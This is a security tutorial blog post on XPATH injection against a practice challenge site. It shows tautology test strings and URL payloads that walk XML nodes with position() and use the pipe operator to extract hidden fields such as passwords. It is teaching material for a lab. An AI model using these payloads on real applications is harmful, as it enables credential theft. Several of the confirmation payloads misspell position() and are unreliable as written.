Long time after posting the basics of XPATH for XPATH Injection, here we are with the first part of XPATH injection. I wont take much time in this one as i suppose if you have read the other tutorials on XPATH Here. In this tutorial we will learn how to inject into XPATH vuln URL with Zero knowledge of the file structure.

We are going to discuss the following in this tutorial.
1. Testing and confirming XPATHi
2. Iterating through the Nodes
3. Extracting Data from Siblings

First of all i hope you know the basics of what XPATH is, structure of a XML file, quries used to extract data from XML using XPATH. If you dont then i am sure you ll get "Very Confused" with this tutorial


So before you start reading this i suppose you read other tutorials on XPATH.

1. Testing and confirming XPATHi

Testing for XPATH and confirming it is the most important part as most of us and specially the readers of securityidiots see SQLi everywhere and anywhere they find an error even if the error is Conversional Error, Internal Error, Programming Error and even some times people assume that getting blocked by WAF on typing "Union select" means its vulnerable to SQLi. Hmmm interesting and there reaction is like :



Well guys i suppose i have written enough tutorial on how to test and confirm SQLi, sometimes its good to read them also. Keeping that apart here we are going to start testing for XPATH.

When we see an input feild the first thing we ll check is making it true using the below tests:
1 or 1=1
1 or true
' or ''='
" or ""="
and in case of XPATH or SQLi and many other Injections they will work same. So now to confirm if its XPATHi we can use position() function, which is specific to XPATH. Here are few tests we can try:
1 or postition()=1 or 1=1
1 or postition()=1 or true
' or postition()=1 or ''='
" or postition()=1 or ""="
If any of the above works then you can assume that the injection you are dealing with is a XPATH Injection. Now below is an example XML file which we ll be using throughout this tutorial:

<xmlfile>
<users>
	<user>
		<name first="Zenodermus" last="Javanicus"/>
		<id>1</id>
		<username>Zen</username>
		<password>n00b_132</password>
		<phone>123-456-7890</phone>
	</user>
	<user>
		<name first="Rahul" last="Maane"/>
		<id>2</id>
		<username>Monster</username>
		<password>i_om-GAWWWD</password>
		<phone>603-478-4115</phone>
	</user>
	<user>
		<name first="Ashx" last="Khan"/>
		<id>3</id>
		<username>Trojan</username>
		<password>ihavemoregfsthanyou</password>
		<phone>222-222-2222</phone>
	</user>
	<user>
		<name first="Rummy" last="Khan"/>
		<id>4</id>
		<username>CyberGh0st</username>
		<password>SelectPassFromDual</password>
		<phone>88-777-8989</phone>
	</user>
</users>
</xmlfile>

Now here are some basic XPATH queries which can be used to extract data from the above file:
To Extract username where id=1
/xmlfile/users/user[id='1']/username
To Extract username where id=2
/xmlfile/users/user[id='2']/username
To Extract password where username is Monster
/xmlfile/users/user[username="Monster"]/password
To Extract phone where username is Trojan and password is ihavemoregfsthanyou
/xmlfile/users/user[username="Trojan" and password="ihavemoregfsthanyou"]/phone
To Extract the first username
/xmlfile/users/user[position()=1]/username

Looking at all the above example queries i think it must be clear enough for all of you to understand the basic way of extracting data using XPATH queries.

Now lets take this example "Link" which shows the phone number of the user passed in the username parameter. Now we can only get the number if we know the username.

2. Iterating through the Nodes

So here lets try injecting it with XPATH. Before we start injecting lets assume what could be the query working inside, it should be something like "/root/semething/user[username="<Our_Intput_here>"]/phone" assuming this lets try the below injections:
http://leettime.net/zen_challenge1/challenge_2.php?username='or''='
And we got the number of first user, now to get the number of second user we ll use position() as i used before above
http://leettime.net/zen_challenge1/challenge_2.php?username='or position()=2 and''='
And we got the number of Second user, so on we can keep changing position() to get the rest of users phone numbers.
http://leettime.net/zen_challenge1/challenge_2.php?username='or position()=3 and''='
And we got the number of Third user, so on we can keep changing position() to get the rest of users phone numbers.
Here we are done iterating through the nodes but the problem is we are not able to extract the other details like passwords etc. Which should and must be saved in the same XML file. Now here comes the next step using which we can even enumerate any other details we want.

3. Extracting Data from Siblings

Till now we were using position so we are able to enumerate through the nodes only but /phone in the end is hard coded so we cant change it to extract other data. But worry not!! we have the Pipe operator which works to combine two queries in XPATH. Here is how we can do this:
http://leettime.net/zen_challenge1/challenge_2.php?username=' or position()=1]/*[2]|/a['
The above Injection extracts the Second Element from first node.
http://leettime.net/zen_challenge1/challenge_2.php?username=' or position()=1]/*[3]|/a['
The above Injection extracts the Third Element from first node.
http://leettime.net/zen_challenge1/challenge_2.php?username=' or position()=1]/*[4]|/a['
The above Injection extracts the Forth Element from first node.
http://leettime.net/zen_challenge1/challenge_2.php?username=' or position()=1]/*[5]|/a['
The above Injection extracts the Fifth Element from first node.
http://leettime.net/zen_challenge1/challenge_2.php?username=' or position()=2]/*[2]|/a['
Here i changed the position which means it will extract data from the second node second element, so on you can keep changing and extracting.
Using this we can extract data with Zero Knowledge of the internal file structure. Here is a XPATHi challenge you can try solving the above method:
http://leettime.net/index.php
Here try extracting the username and password of all the users. Thats all for this tutorial, will catch you back soon with another tutorial.

Author : Zenodermus Javanicus
Date : 2015-02-22